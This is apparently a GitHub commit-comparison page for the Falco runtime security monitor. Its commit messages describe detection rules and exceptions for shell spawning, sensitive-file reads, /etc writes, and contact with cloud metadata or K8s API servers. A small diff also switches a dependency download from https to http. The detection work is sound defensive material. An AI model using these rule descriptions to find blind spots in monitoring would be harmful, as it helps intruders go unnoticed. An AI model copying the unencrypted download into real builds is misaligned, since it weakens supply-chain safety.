Compare commits

...

102 Commits

Author SHA1 Message Date
Anoop Gupta
b99a4e5ccf Merge remote-tracking branch 'origin/dev' into agent-master 2018-04-04 15:29:24 -07:00
Mark Stemm
88327abb41 Unit test for fd.net + in operator fixes (#343)
Tests fix for https://github.com/draios/falco/issues/339. Depends on
https://github.com/draios/sysdig/pull/1091.
2018-04-04 14:23:21 -07:00
Mark Stemm
1516fe4eac Rule updates 2018 02.v3 (#344)
* add common fluentd command, let docker modify

Add a common fluentd command, and let docker operations modify bin dir

* Add abrt-action-sav(...) as a rpm program

https://linux.die.net/man/1/abrt-action-save-package-data

* Add etc writers for more ms-on-linux svcs

Microsoft SCX and Azure Network Watcher Agent.

* Let nginx write its own config.

* Let chef-managed gitlab write gitlab config

* Let docker container fsen outside of containers

The docker process can also be outside of a container when doing actions
like docker save, etc, so drop the docker requirement.

* Expand the set of haproxy configs.

Let the parent process also be haproxy_reload and add an additional
directory.

* Add an additional node-related file below /root

For node cli.

* Let adclient read sensitive files

Active Directory Client.

* Let mesos docker executor write shells

* Add additional privileged containers.

A few more openshift-related containers and datadog.

* Add a kafka admin command line as allowed shell

In this case, run by cassandra

* Add additional ignored root directories

gradle and crashlytics

* Add back mesos shell spawning binaries back

This list will be limited only to those binaries known to spawn
shells. Add mesos-slave/mesos-health-ch.

* Add addl trusted containers

Consul and mesos-slave.

* Add additional config writers for sosreport

Can also write files below /etc/pki/nssdb.

* Expand selinux config progs

Rename macro to selinux_writing_conf and add additional programs.

* Let rtvscand read sensitive files

Symantec av cli program.

* Let nginx-launch write its own certificates

Sometimes directly, sometimes by invoking openssl.

* Add addl haproxy config writers

Also allow the general prefix /etc/haproxy.

* Add additional root files.

Mongodb-related.

* Add additional rpm binaries

rpmdb_stat

* Let python running get-pip.py modify binary files

Used as a part of directly running get-pip.py.

* Let centrify scripts read sensitive files

Scripts start with /usr/share/centrifydc

* Let centrify progs write krb info

Specifically, adjoin and addns.

* Let ansible run below /root/.ansible

* Let ms oms-run progs manage users

The parent process is generally omsagent-<version> or scx-<version.

* Combine & expand omiagent/omsagent macros

Combine the two macros into a single ms_oms_writing_conf and add both
direct and parent binaries.

* Let python scripts rltd to ms oms write binaries

Python scripts below /var/lib/waagent.

* Let google accounts daemon modify users

Parent process is google_accounts(_daemon).

* Let update-rc.d modify files below /etc

* Let dhcp binaries write indirectly to etc

This allows them to run programs like sed, cp, etc.

* Add istio as a trusted container.

* Add addl user management progs

Related to post-install steps for systemd/udev.

* Let azure-related scripts write below etc

Directory is /etc/azure, scripts are below /var/lib/waagent.

* Let cockpit write its config

http://www.cockpit-project.org/

* Add openshift's cassandra as a trusted container

* Let ipsec write config

Related to strongswan (https://strongswan.org/).

* Let consul-template write to addl /etc files

It may spawn intermediate shells and write below /etc/ssl.

* Add openvpn-entrypo(int) as an openvpn program

Also allow subdirectories below /etc/openvpn.

* Add additional files/directories below /root

* Add cockpit-session as a sensitive file reader

* Add puppet macro back

Still used in some people's user rules files.

* Rename name= to program=

Some users pointed out that name= was ambiguous, especially when the
event includes files being acted upon. Change to program=.

* Also let omiagent run progs that write oms config

It can run things like python scripts.

* Allow writes below /root/.android
2018-04-02 18:10:11 -07:00
Mark Stemm
559240b628 Example puppet module for falco (#341)
Add an example puppet module for falco. This module configures the main
falco configuration file /etc/falco/falco.yaml, providing templates for
all configuration options.

It installs falco using debian/rpm packages and installs/manages it as a
systemd service.
2018-03-28 11:50:04 -07:00
Mark Stemm
2a3ca21779 Skip output json format (#342)
* Add option to exclude output property in json fmt

New falco.yaml option json_include_output_property controls where the
formatted string "output" is included in the json object when json
output is enabled. By default the string is included.

* Add tests for new json output option

New test sets json_include_output_property to false and then verifies
that the json output does *not* contain the surrounding text "Warning an
open...".
2018-03-28 11:24:09 -07:00
Mark Stemm
a3f53138d3 Example showing cryptomining exploit (#336)
An example showing how an overly permissive container environment can be
exploited to install and run cryptomining software on a host system.
2018-03-16 15:17:39 -07:00
Brett Bertocci
05c4ba1842 Merge branch 'dev' into agent-master 2018-03-08 14:47:06 -08:00
Mark Stemm
eb4feed1b6 Associate --validate with -V. (#334)
* Associate --validate with -V.

This fixes https://github.com/draios/falco/issues/322.

* Pin the version of libvirt-python to < 4.1.0

Evidently a recent libvirt-python has build problems on ubuntu. See
https://bugs.launchpad.net/openstack-requirements/+bug/1753539.

Pin to releases < 4.1.0 to avoid picking up the newer one that
has the build failure.
2018-03-08 13:03:26 -08:00
Brett Bertocci
45d467656f Merge branch 'dev' into agent-master 2018-03-08 12:38:44 -08:00
Luca Marturana
ba6d6dbf9d Use gcc 5 by default to compile properly on Ubuntu Xenial, remove gcc 4.9 since CentOS does not work anyway due to glibc 2018-02-27 09:39:13 -08:00
Mark Stemm
38eb5b8741 Add more validations (#329)
* Add the ability to validate multiple rules files

Allow multiple -V arguments just as we do with multiple -r arguments.

* With verbose output, print dangling macros/lists

Start tracking whether or not a given macro/list is actually used when
compiling the set of rules. Every macro/list has an attribute used,
which defaults to false and is set to true whenever it is referred to in
a macro/rule/list.

When run with -v, any macro/list that still has used=false results in a
warning message.

Also, it turns out the fix for
https://github.com/draios/falco/issues/197 wasn't being applied to
macros. Fix that.
2018-02-26 16:59:18 -05:00
Mark Stemm
947faca334 Rule updates 2018 02.v2 (#326)
* Let OMS agent for linux write config

Programs are omiagent/omsagent/PerformInventor/in_heartbeat_r* and files
are below /etc/opt/omi and /etc/opt/microsoft/omsagent.

* Handle really long classpath lines for cassandra

Some cassandra cmdlines are so long the classpath truncates the cmdline
before the actual entry class gets named. In those cases also look for
cassandra-specific config options.

* Let postgres binaries read sensitive files

Also add a couple of postgres cluster management programs.

* Add apt-add-reposit(ory) as a debian mgmt program

* Add addl info to debug writing sensitive files

Add parent/grandparent process info.

* Requrire root directory files to contain /

In some cases, a file below root might be detected but the file itself
has no directory component at all. This might be a bug with dropped
events. Make the test more strict by requiring that the file actually
contains a "/".

* Let updmap read sensitive files

Part of texlive (https://www.tug.org/texlive/)

* For selected rules, require proc name to exist

Some rules such as reading sensitive files and writing below etc have
many exceptions that depend on the process name. In very busy
environments, system call events might end up being dropped, which
causes the process name to be missing.

In these cases, we'll let the sensitive file read/write below etc to
occur. That's handled by a macro proc_name_exists, which ensures that
proc.name is not "<NA>" (the placeholder when it doesn't exist).

* Let ucf write generally below /etc

ucf is a general purpose config copying program, so let it generally
write below /etc, as long as it in turn is run by the apt program
"frontend".

* Add new conf writers for couchdb/texmf/slapadd

Each has specific subdirectories below /etc

* Let sed write to addl temp files below /etc

Let sed write to additional temporary files (some directory + "sed")
below /etc. All generally related to package installation scripts.

* Let rabbitmq(ctl) spawn limited shells

Let rabbitmq spawn limited shells that perform read-only tasks like
reading processes/ifaces.

Let rabbitmqctl generally spawn shells.

* Let redis run startup/shutdown scripts

Let redis run specific startup/shutdown scripts that trigger at
start/stop. They generally reside below /etc/redis, but just looking for
the names redis-server.{pre,post}-up in the commandline.

* Let erlexec spawn shells

https://github.com/saleyn/erlexec, "Execute and control OS processes
from Erlang/OTP."

* Handle updated trace files

As a part of these changes, we updated some of the positive trace files
to properly include a process name. These newer trace files have
additional opens, so update the expected event counts to match.

* Let yum-debug-dump write to rpm database

* Additional config writers

Symantec AV for Linux, sosreport, semodule (selinux), all with their
config files.

* Tidy up comments a bit.

* Try protecting node apps again

Try improving coverage of run shell untrusted by looking for shells
below node processes again. Want to see how many FPs this causes before
fully committing to it.

* Let node run directly by docker count as a service

Generally, we don't want to consider all uses of node as a service wrt
spawned shells. But we might be able to consider node run directly by
docker as a "service". So add that to protected_shell_spawner.

* Also add PM2 as a protected shell spawner

This should handle cases where PM2 manages node apps.

* Remove dangling macros/lists

Do a pass over the set of macros/lists, removing most of those that are
no longer referred to by any macro/list. The bulk of the macros/lists
were related to the rule Run Shell Untrusted, which was refactored to
only detect shells run below specific programs. With that change, many
of these exceptions were no longer neeeded.

* Add a "never_true" macro

Add a never_true macro that will never match any event. Useful if you
want to disable a rule/macro/etc.

* Add missing case to write_below_etc

Add the macro veritas_writing_config to write_below_etc, which was
mistakenly not added before.

* Make tracking shells spawned by node optional

The change to generally consider node run directly in a container as a
protected shell spawner was too permissive, causing false
positives. However, there are some deployments that want to track shells
spawned by node as suspect. To address this, create a macro
possibly_node_in_container which defaults to never matching (via the
never_true) macro. In a user rules file, you can override the macro to
remove the never_true clause, reverting to the old behavior.

* Add some dangling macros/lists back

Some macros/lists are still referred to by some widely used user rules
files, so add them back temporarily.
2018-02-26 13:26:28 -05:00
Mark Stemm
0a66bc554a Improvements to falco daemonset configuration (#325)
* Use kubernetes.default to reach k8s api server

Originally raised in #296, but since then we documented rbac and
without-rbac methods, so mirroring the change here.

* Mount docker socket/dev read-write

This matches the direct docker run commands, which also mount those
resources read-write.
2018-02-20 12:57:59 -05:00
Jean-Philippe Lachance
4d8e982f78 + Add gdb in the development Docker image to help debugging (#323)
sysdig-CLA-1.0-signed-off-by: Jean-Philippe Lachance <jplachance@coveo.com>
2018-02-20 11:54:13 -05:00
Jean-Philippe Lachance
52e8c16903 + Add the user_known_change_thread_namespace_binaries list to simplify "Change thread namespace" rule tweaks (#324)
sysdig-CLA-1.0-signed-off-by: Jean-Philippe Lachance <jplachance@coveo.com>
2018-02-20 11:53:25 -05:00
Mark Stemm
414c9a0eed Rule updates 2018 02.v1 (#321)
* Add additional allowed files below root.

These are related to node.js apps.

* Let yum-config-mana(ger) write to rpm database.

* Let gugent write to (root) + GuestAgent.log

vRA7 Guest Agent writes to GuestAgent.log with a cwd of root.

* Let cron-start write to pam_env.conf

* Add additional root files and directories

All seen in legitimate cases.

* Let nginx run aws s3 cp

Possibly seen as a part of consul deployments and/or openresty.

* Add rule for disallowed ssh connections

New rule "Disallowed SSH Connection" detects ssh connection attempts
other than those allowed by the macro allowed_ssh_hosts. The default
version of the macro allows any ssh connection, so the rule never
triggers by default.

The macro could be overridden in a local/user rules file, though.

* Detect contacting NodePort svcs in containers

New rule "Unexpected K8s NodePort Connection" detects attempts to
contact K8s NodePort services (i.e. ports >=30000) from within
containers.

It requires overridding a macro nodeport_containers which specifies a
set of containers that are allowed to use these port ranges. By default
every container is allowed.
2018-02-20 10:06:13 -05:00
Thom van Os
3912e6e44b Merge branch 'dev' into agent-master 2018-01-30 14:51:13 -08:00
Mark Stemm
1564e87177 Rule updates 2018.01.v1 (#319)
* Remove remaining fbash references.

No longer relevant after all the installer rules were removed.

* Detect contacting EC2 metadata svc from containers

Add a rule that detects attempts to contact the ec2 metadata service
from containers. By default, the rule does not trigger unless a list of
explicitly allowed containers is provided.

* Detect contacting K8S API Server from container

New rule "Contact K8S API Server From Container" looks for connections
to the K8s API Server. The ip/port for the K8s API Server is in the
macro k8s_api_server and contains an ip/port that's not likely to occur
in practice, so the rule is effectively disabled by default.
2018-01-25 16:06:15 -08:00
Anoop Gupta
958c0461bb Merge remote-tracking branch 'origin/dev' into agent-master 2018-01-25 15:05:25 -08:00
Mark Stemm
070a67d069 Use http dependencies (#317)
Some versions of cmake include a libcurl that don't have ssl support,
and verifying the md5sums should be enough.
2018-01-18 09:04:08 -08:00
Mark Stemm
1feae90c74 Rule updates vdec2 (#315)
* Additional rpm writers, root directories

salt-minion can also touch the rpm database, and some node packages
write below /root/.config/configstore.

* Add smbd as a protected shell spawner.

It's a server-like program.

* Also handle .ash_history

default shell for alpine linux

* Add exceptions for veritas

Let many veritas programs write below /etc/vx.

Let one veritas-related perl script read sensitive files.

* Allow postgres to run wal-e

https://github.com/wal-e/wal-e, archiving program for postgres.

* Let consul (agent) run addl scripts

Also let consul (agent, but the distinction is in the command line args)
to run nc in addition to curl. Also rename the macro.

* Let postgres setuid to itself

Let postgres setuid to itself. Seen by archiving programs like wal-e.

* Also allow consul to run alert check scripts

"sh -c /bin/consul-alerts watch checks --alert-addr 0.0.0.0:9000 ..."

* Add additional privileged containers.

Openshift's logging support containers generally run privileged.

* Let addl progs write below /etc/lvm

Add lvcreate as a program that can write below /etc/lvm and rename the
macro to lvprogs_writing_lvm_archive.

* Let glide write below root

https://glide.sh/, package management for go.

* Let sosreport read sensitive files.

* Let scom server read sensitive files.

Microsoft System Center Operations Manager (SCOM).

* Let kube-router run privileged.

https://github.com/cloudnativelabs/kube-router

* Let needrestart_binaries spawns shells

Was included in prior version of shell rules, adding back.

* Let splunk spawn shells below /opt/splunkforwarder

* Add yum-cron as a rpm binary

* Add a different way to run denyhosts.

Strange that the program is denyhosts.py but observed in actual
environments.

* Let nrpe setuid to nagios.

* Also let postgres run wal-e wrt shells

Previously added as an exception for db program spawned process, need to
add as an exception for run shell untrusted.

* Remove installer shell-related rules

They aren't used that often and removing them cleans up space for new
rules we want to add soon.
2018-01-17 20:29:45 -08:00
Mark Stemm
8aeef034a6 Remove installer-related traces
We removed the installer-related rules, so remove the installer-related
traces as well.
2018-01-17 17:40:38 -08:00
Mark Stemm
c7bcc2dce0 Addl CHANGELOG changes for 0.9.0 2018-01-17 17:00:42 -08:00
Mark Stemm
3e2f9f63d3 Update changelog/README for 0.9.0 (#316) 2018-01-17 16:58:44 -08:00
Brett Bertocci
19db7890b3 Merge branch 'dev' into agent-master 2018-01-11 17:25:47 -08:00
Michael Ducy
cef147708a Update K8S Daemon Set for RBAC & ConfigMap (#309)
* Update K8S Daemon Set for RBAC & ConfigMap

* Fix typo in command
2017-12-20 22:58:20 -05:00
Mark Stemm
1c9f86bdd8 Merge branch 'dev' into agent-master 2017-12-13 13:35:57 -08:00
Mark Stemm
db0d913acc Rule updates vdec (#307)
* Let kubelet running loopback spawn shells

Seen by @JPLachance, thanks for the heads up!

* Let docker's "exe" broadly write to files.

As a part of some docker commands like "docker save", etc, the program
exe can write from files on the host filesystem /var/lib/docker/... to a
variety of files within the container.

Allow this via a macro exe_running_docker_save that checks the
commandline as well as the parent and use it as an exclusion for the
write below binary dir/root/etc rules.

* Let chef perform more tasks

- Let chef-client generally read sensitive files and write below /etc.
- Let python running a chef script yum-dump.py write the rpm database.
2017-12-11 22:34:50 -08:00
Luca Marturana
e0458cba67 Merge branch 'dev' into agent-master 2017-12-04 11:18:18 +01:00
Mark Stemm
af564f17a6 Add ability to override shell spawning binaries (#304)
Rename user_known_container_shell_spawn_binaries to
user_known_shell_spawn_binaries (the container distinction doesn't exist
any longer) and add it as an exception for run shell untrusted.

That way others can easily exclude shell spawning programs in a second
rules file.
2017-12-01 12:30:04 -08:00
Mark Stemm
cd2b210fe3 Merge branch 'dev' into agent-master 2017-11-28 09:18:58 -08:00
Mark Stemm
d6d975e28c Refactor shell rules (#301)
* Refactor shell rules to avoid FPs.

Refactoring the shell related rules to avoid FPs. Instead of considering
all shells suspicious and trying to carve out exceptions for the
legitimate uses of shells, only consider shells spawned below certain
processes suspicious.

The set of processes is a collection of commonly used web servers,
databases, nosql document stores, mail programs, message queues, process
monitors, application servers, etc.

Also, runsv is also considered a top level process that denotes a
service. This allows a way for more flexible servers like ad-hoc nodejs
express apps, etc to denote themselves as a full server process.

* Update event generator to reflect new shell rules

spawn_shell is now a silent action. its replacement is
spawn_shell_under_httpd, which respawns itself as httpd and then runs a
shell.

db_program_spawn_binaries now runs ls instead of a shell so it only
matches db_program_spawn_process.

* Comment out old shell related rules

* Modify nodejs example to work w/ new shell rules

Start the express server using runit's runsv, which allows falco to
consider any shells run by it as suspicious.

* Use the updated argument for mkdir

In https://github.com/draios/sysdig/pull/757 the path argument for mkdir
moved to the second argument. This only became visible in the unit tests
once the trace files were updated to reflect the other shell rule
changes--the trace files had the old format.

* Update unit tests for shell rules changes

Shell in container doesn't exist any longer and its functionality has
been subsumed by run shell untrusted.

* Allow git binaries to run shells

In some cases, these are run below a service runsv so we still need
exceptions for them.

* Let consul agent spawn curl for health checks

* Don't protect tomcat

There's enough evidence of people spawning general commands that we
can't protect it.

* Reorder exceptions, add rabbitmq exception

Move the nginx exception to the main rule instead of the
protected_shell_spawner macro. Also add erl_child_setup (related to
rabbitmq) as an allowed shell spawner.

* Add additional spawn binaries

All off these are either below nginx, httpd, or runsv but should still
be allowed to spawn shells.

* Exclude shells when ancestor is a pkg mgmt binary

Skip shells when any process ancestor (parent, gparent, etc) is a
package management binary. This includes the program needrestart. This
is a deep search but should prevent a lot of other more detailed
exceptions trying to find the specific scripts run as a part of
installations.

* Skip shells related to serf

Serf is a service discovery tool and can in some cases be spawned by
apache/nginx. Also allow shells that are just checking the status of
pids via kill -0.

* Add several exclusions back

Add several exclusions back from the shell in container rule. These are
all allowed shell spawns that happen to be below
nginx/fluentd/apache/etc.

* Remove commented-out rules

This saves space as well as cleanup. I haven't yet removed the
macros/lists used by these rules and not used anywhere else. I'll do
that cleanup in a separate step.

* Also exclude based on command lines

Add back the exclusions based on command lines, using the existing set
of command lines.

* Add addl exclusions for shells

Of note is runsv, which means it can directly run shells (the ./run and
./finish scripts), but the things it runs can not.

* Don't trigger on shells spawning shells

We'll detect the first shell and not any other shells it spawns.

* Allow "runc:" parents to count as a cont entrypnt

In some cases, the initial process for a container can have a parent
"runc:[0:PARENT]", so also allow those cases to count as a container
entrypoint.

* Use container_entrypoint macro

Use the container_entrypoint macro to denote entering a container and
also allow exe to be one of the processes that's the parent of an
entrypoint.
2017-11-28 07:04:37 -08:00
Luca Marturana
5ac3e7d074 Merge branch 'dev' into agent-master 2017-11-21 12:18:56 +01:00
Mark Stemm
60af4166de Rule updates vnov (#300)
* Let supervisor write more generally below /etc

* Let perl+plesk scripts run shells/write below etc

* Allow spaces after some cmdlines

* Add additional shell spawner.

* Add addl package mgmt binaries.

* Add addl cases for java + jenkins

Addl jar files to consider.

* Add addl jenkins-related cmdlines

Mostly related to node scripts run by jenkins

* Let python running some mesos tasks spawn shells

In this case marathon run by python

* Let ucf write below etc

Only below /etc/gconf for now.

* Let dpkg-reconfigur indirectly write below /etc

It may run programs that modify files below /etc

* Add files/dirs/prefixes for writes below root

Build a set of acceptable files/dirs/prefixes for writes below
/root. Mostly triggered by apps that run directly as root.

* Add addl shell spawn binaries.

* Also let java + sbt spawn shells in containers

Not seen only at host level

* Make sure the file below etc is /etc/

Make sure the file below /etc is really below the directory etc aka
/etc/xxx. Otherwise it would match a file /etcfoo.

* Let rancher healthcheck spawn shells

The name healthcheck is relatively innocuous so also look at the parent
process.

* Add addl shell container shell spawn binaries

* Add addl x2go binaries

* Let rabbitq write its config files

* Let rook write below /etc

toolbox.sh is fairly generic so add a condition based on the image name.

* Let consul-template spawn shells

* Add rook/toolbox as a trusted container

Their github pages recommend running privileged.

* Add addl mail binary that can setuid

* Let plesk autoinstaller spawn shells

The name autoinstaller is fairly generic so also look at the parent.

* Let php handlers write its config

* Let addl pkg-* binary write to /etc indirectly

* Add additional shell spawning binaries.

* Add ability to specify user trusted containers

New macro user_trusted_containers allows a user-provided set of
containers that are trusted and are allowed to run privileged.

* If npm runs node, let node spawn shells

* Let python run airflow via a shell.

* Add addl passenger commandlines (for shells)

* Add addl ways datadog can be run

* Let find run shells in containers.

* Add rpmq as a rpm binary

* Let httpd write below /etc/httpd/

* Let awstats/sa-update spawn shells

* Add container entrypoint as a shell

Some images have an extra shell level for image entrypoints.

* Add an additional jenkins commandline

* Let mysql write its config

* Let openvpn write its config

* Add addl root dirs/files

Also move /root/.java to be a general prefix.

* Let mysql_upgrade/opkg-cl spawn shells

* Allow login to perform dns lookups

With run with -h <host> to specify a remote host, some versions of login
will do a dns lookup to try to resolve the host.

* Let consul-template write haproxy config.

* Also let mysql indirectly edit its config

It might spawn a program to edit the config in addition to directly.

* Allow certain sed temp files below /etc/

* Allow debian binaries to indirectly write to /etc

They may spawn programs like sed, touch, etc to change files below /etc.

* Add additional root file

* Let rancher healthcheck be run more indirectly

The grandparent as well as parent of healthcheck can be tini.

* Add more cases for haproxy writing config

Allow more files as well as more scripts to update the config.

* Let vmtoolsd spawn shells on the host

* Add an additional innocuous entrypoint shell

* Let peer-finder (mongodb) spawn shells

* Split application rules to separate file.

Move the contents of application rules, which have never been enabled by
default, to a separate file. It's only installed in the mail falco packages.

* Add more build-related command lines

* Let perl running openresty spawn shells

* Let countly write nginx config

* Let confd spawn shells

* Also let aws spawn shells in containers.
2017-11-16 12:12:31 -08:00
Brett Bertocci
d321666ee5 Merge branch 'dev' into agent-master 2017-11-10 14:08:13 -08:00
Mark Stemm
7169dd9cf0 Merge pull request #298 from draios/addl-rule-updates
Addl rule updates
2017-11-10 12:58:41 -08:00
Mark Stemm
15ed651da9 Add additional spawned shells for docker 2017-11-10 12:15:25 -08:00
Mark Stemm
7441052b9a Let consul spawn shells 2017-11-10 12:15:25 -08:00
Mark Stemm
69ede8a785 Let addl progs read sensitive files
They only display file meta-information.
2017-11-10 12:15:25 -08:00
Mark Stemm
8dd34205a8 Let java write specific config files below /etc 2017-11-10 12:15:25 -08:00
Mark Stemm
f379e97124 Let haproxy installation write its config files
The direct or parent process starts with update-haproxy- and the file is
below /etc/haproxy.
2017-11-10 12:15:25 -08:00
Mark Stemm
109f86cd85 Let ruby running pups spawn shells 2017-11-10 12:15:25 -08:00
Mark Stemm
e51fbd6569 Let python/mesos health checks spawn shells 2017-11-10 12:15:13 -08:00
Mark Stemm
060bf78ed8 Add conda as a scripting binary for builds
conda == python packaging tool
2017-11-10 12:05:28 -08:00
Mark Stemm
a2a4cbf586 Let endeca spawn shells in containers also 2017-11-09 14:17:38 -08:00
Mark Stemm
b4bd11bf70 Let nsrun spawn shells in containers. 2017-11-09 14:16:52 -08:00
Mark Stemm
d5869599f7 Add additional innocuous command lines. 2017-11-09 14:16:24 -08:00
Mark Stemm
b0bc00224c Also let terminal shells run innocuous cmdlines
The terminal shell in container rule has always been less permissive
than the other shell rules, mostly because we expect terminal-attached
shells to be less common. However, they might run innocuous commands,
especially from scripting languages like python. So allow the innocuous
commands to run.
2017-11-09 14:13:04 -08:00
Mark Stemm
2f4b39ae6f Let find spawn shells 2017-11-09 14:12:41 -08:00
Mark Stemm
326fb2998a Let curl write below the pki db
Seems to do these writes on redhat?
2017-11-09 14:11:36 -08:00
Mark Stemm
e3ef7a2ed4 Be more flexible about perl Makefile.PL
Allow the command line to start with that command.
2017-11-09 14:10:35 -08:00
Mark Stemm
43f7ee00fb Add an additional ics script ics_status.sh 2017-11-09 14:10:14 -08:00
Mark Stemm
8bcd0e8f05 Add additional cron binaries. 2017-11-09 14:09:36 -08:00
Mark Stemm
85f51cf38c Let salt-minion read sensitive files. 2017-11-08 13:42:24 -08:00
Mark Stemm
2467766f07 Add addl shell spawn conditions
flock can spawn shells, new allowed shell cmdline.
2017-11-08 13:41:43 -08:00
Mark Stemm
2cbff6ff70 Add addl safe root directories 2017-11-08 13:40:56 -08:00
Mark Stemm
e02135f9f0 Let datadog write its config files 2017-11-08 13:40:36 -08:00
Mark Stemm
c1de3dfe7a Let ovsdb-server write below /etc/openvswitch 2017-11-08 13:39:20 -08:00
Mark Stemm
27df0ad29b Add nagios as a monitoring binary
Runs lots of shells
2017-11-08 13:38:07 -08:00
Mark Stemm
e7c2068267 Add addl ruby binary when run by bundle 2017-11-08 13:13:00 -08:00
Mark Stemm
ffed7ef63c Add additional rpm binaries. 2017-11-08 09:28:45 -08:00
Mark Stemm
fe283dcd76 Add exceptions for /root, / writes
Java running as root as well as oracle.
2017-11-08 09:21:17 -08:00
Mark Stemm
4a0ec07235 Let celeryd spawn shells
Parent process name is strange with leading [ and trailing :, so quote
it.
2017-11-08 08:12:35 -08:00
Mark Stemm
fdebfb5b6c Add N_scheduler binaries for mesos
I believe these are related to the equivalent of docker exec for mesos
containers, and aren't specifically related to rabbitmq.
2017-11-08 08:05:42 -08:00
Mark Stemm
0b775fa722 Let java running endeca spawn shells 2017-11-07 11:19:24 -08:00
Mark Stemm
33faa911d7 Add addl npm cmdlines. 2017-11-07 11:18:33 -08:00
Mark Stemm
24fb84df60 Let docker start script spawn shells 2017-11-07 11:14:50 -08:00
Mark Stemm
7550683862 Add additional shell spawn programs. 2017-11-07 11:06:13 -08:00
Mark Stemm
5755e79fe9 Let polkit-agent-he(lper) read sensitive files. 2017-11-07 11:06:13 -08:00
Mark Stemm
dfbe450eeb Let datastax progs spawn shells
Various script-based launch points.
2017-11-07 11:06:13 -08:00
Mark Stemm
0867245b73 Let yum indirectly run user mgmt binaries
They run shells that run the user binaries, at various levels in the
process heirarchy.
2017-11-07 11:06:13 -08:00
Mark Stemm
82377348ce Add another way to run npm
This one seen on redhat installs
2017-11-07 11:00:43 -08:00
Mark Stemm
fdb2312bcf Let perl Makefile.PL spawn shells 2017-11-07 11:00:19 -08:00
Mark Stemm
fbb5451fd9 Let python running zookeeper spawn shells 2017-11-07 10:59:40 -08:00
Mark Stemm
83c309a6c0 Let subscription-ma(nager) write to rpm db. 2017-11-07 10:57:10 -08:00
Mark Stemm
6bcf397a17 Let plesk weekly cron job spawn shells 2017-11-07 10:19:42 -08:00
Mark Stemm
9ceb11a7c8 Let update-xmlcatal(og) write below /etc/xml 2017-11-07 10:19:19 -08:00
Mark Stemm
e4443bea8e Add additional make-like binaries. 2017-11-07 10:18:56 -08:00
Mark Stemm
15e2d0bf7e Add addl bitnami conditions. 2017-11-07 09:54:09 -08:00
Mark Stemm
480ba4e0f8 Let duply write below /etc/duply
It's a shell script that runs touch so the detection is slightly more
complicated.
2017-11-07 09:43:07 -08:00
Mark Stemm
6aae17600f Add addl ruby proc for builds.
Adding ruby2.1
2017-11-07 09:42:15 -08:00
Mark Stemm
e9e0177901 Add additional phusion cmdlines. 2017-11-06 15:28:16 -08:00
Mark Stemm
01459fb49a Let threatstack spawn shells
Either as tsvuln or via node cmdline.
2017-11-06 15:28:16 -08:00
Mark Stemm
d36df62d1e Add an additional yarn cmdline. 2017-11-06 15:26:03 -08:00
Mark Stemm
36d775100e Be more tolerant of es curator procs
The command line occasionally ends with a space.
2017-11-03 17:26:37 -07:00
Mark Stemm
0020b05624 Add additional details for some rules
Helps diagnose FPs.
2017-11-03 16:01:38 -07:00
Mark Stemm
3edfc6ba8e Let plesk run mktemp below /etc 2017-11-03 16:01:12 -07:00
Mark Stemm
9ed1ff5f26 Add additional shell spawning cmdlines/progs 2017-11-03 16:00:03 -07:00
Mark Stemm
664d8fbc1d Add addl mail config binaries
Add additional mail config-related binaries. Also they aren't solely
sendmail-related, so make the list mail_config_binaries.
2017-11-03 15:44:26 -07:00
Mark Stemm
6078d4bd43 Add docker-current as a docker binary. 2017-10-31 20:56:11 -07:00
Mark Stemm
53776b0ec6 Add additional /etc writers 2017-10-31 20:51:18 -07:00
Mark Stemm
2eda3432e9 Let dmeventd write additional dirs 2017-10-31 20:50:58 -07:00
Mark Stemm
56e07f53f2 Let appdynamics spawn shells.
It's java, so look in classpath.
2017-10-30 22:57:08 -07:00
Mark Stemm
87fd4aba70 Let mesos-journald-(logger) spawn shells 2017-10-26 14:17:39 -07:00
Mark Stemm
332e3ad874 Let salt-minion spawn shells 2017-10-26 11:37:12 -07:00
Mark Stemm
5127d51732 Let python run es curator as a shell 2017-10-26 09:42:36 -07:00
Mark Stemm
d8fdaa0d88 Let seed_es_acl spawn shells. 2017-10-26 09:36:07 -07:00
Mark Stemm
b993683b96 Let java running maven spawn shells 2017-10-26 09:35:52 -07:00
Mark Stemm
b8027b5e54 Add additional shell spawn binaries 2017-10-26 09:15:36 -07:00
Mark Stemm
d57b3fe3cf Let spamd read sensitive files. 2017-10-26 09:15:18 -07:00
Mark Stemm
dd3a7df346 Let pam-auth-update/parallels inst write to /etc 2017-10-26 09:14:01 -07:00
Mark Stemm
ba1c8e4506 Let plesk installer write apache config. 2017-10-26 09:13:41 -07:00
57 changed files with 1966 additions and 764 deletions

View File

@@ -17,6 +17,7 @@ install:
- curl -Lo avocado-36.0-tar.gz https://github.com/avocado-framework/avocado/archive/36.0lts.tar.gz
- tar -zxvf avocado-36.0-tar.gz
- cd avocado-36.0lts
- sed -e 's/libvirt-python>=1.2.9/libvirt-python>=1.2.9,<4.1.0/' < requirements.txt > /tmp/requirements.txt && mv /tmp/requirements.txt ./requirements.txt
- sudo -H pip install -r requirements.txt
- sudo python setup.py install
- cd ../falco

View File

@@ -2,6 +2,24 @@
This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
## v0.9.0
Released 2018-01-18
### Bug Fixes
* Fix driver incompatibility problems with some linux kernel versions that can disable pagefault tracepoints [[#sysdig/1034](https://github.com/draios/sysdig/pull/1034)]
* Fix OSX Build incompatibility with latest version of libcurl [[#291](https://github.com/draios/falco/pull/291)]
### Minor Changes
* Updated the Kubernetes example to provide an additional example: Daemon Set using RBAC and a ConfigMap for configuration. Also expanded the documentation for both the RBAC and non-RBAC examples. [[#309](https://github.com/draios/falco/pull/309)]
### Rule Changes
* Refactor the shell-related rules to reduce false positives. These changes significantly decrease the scope of the rules so they trigger only for shells spawned below specific processes instead of anywhere. [[#301](https://github.com/draios/falco/pull/301)] [[#304](https://github.com/draios/falco/pull/304)]
* Lots of rule changes based on feedback from Sysdig Secure community [[#293](https://github.com/draios/falco/pull/293)] [[#298](https://github.com/draios/falco/pull/298)] [[#300](https://github.com/draios/falco/pull/300)] [[#307](https://github.com/draios/falco/pull/307)] [[#315](https://github.com/draios/falco/pull/315)]
## v0.8.1
Released 2017-10-10

View File

@@ -78,7 +78,7 @@ else()
set(ZLIB_INCLUDE "${ZLIB_SRC}")
set(ZLIB_LIB "${ZLIB_SRC}/libz.a")
ExternalProject_Add(zlib
URL "https://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.8.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.8.tar.gz"
URL_MD5 "44d667c142d7cda120332623eab69f40"
CONFIGURE_COMMAND "./configure"
BUILD_COMMAND ${CMD_MAKE}
@@ -104,7 +104,7 @@ else()
